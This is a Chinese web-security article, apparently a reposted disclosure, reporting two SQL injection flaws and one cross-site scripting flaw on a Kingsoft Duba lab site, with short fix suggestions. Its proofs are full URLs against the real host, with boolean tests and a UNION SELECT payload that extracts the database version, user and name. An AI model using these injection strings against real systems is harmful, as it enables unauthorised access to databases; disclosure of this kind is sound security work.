首页 > 网络安全 > 漏洞分析

金山毒霸多个sql注入及XSS漏洞和修复

admin 漏洞分析 2022-02-17 09:46:51 漏洞分析漏洞   修复   注入   毒霸   多个   金山   过滤   app   uuid   http://labs.duba"

  第一个

  简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

  详细说明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

  http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

  结果明显不同 注入漏洞产生

  修复方案:过滤变量app

  第二个

  简要描述:过滤不严导致存在SQL注入

  详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

  http://labs.duba.net/robots.txt

  未作进一步测试

  修复方案:过滤参数

  第三个:

  简要描述:留言处过滤不严 造成跨站漏洞

  详细说明:留言处过滤不严 造成跨站漏洞

  漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149507.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持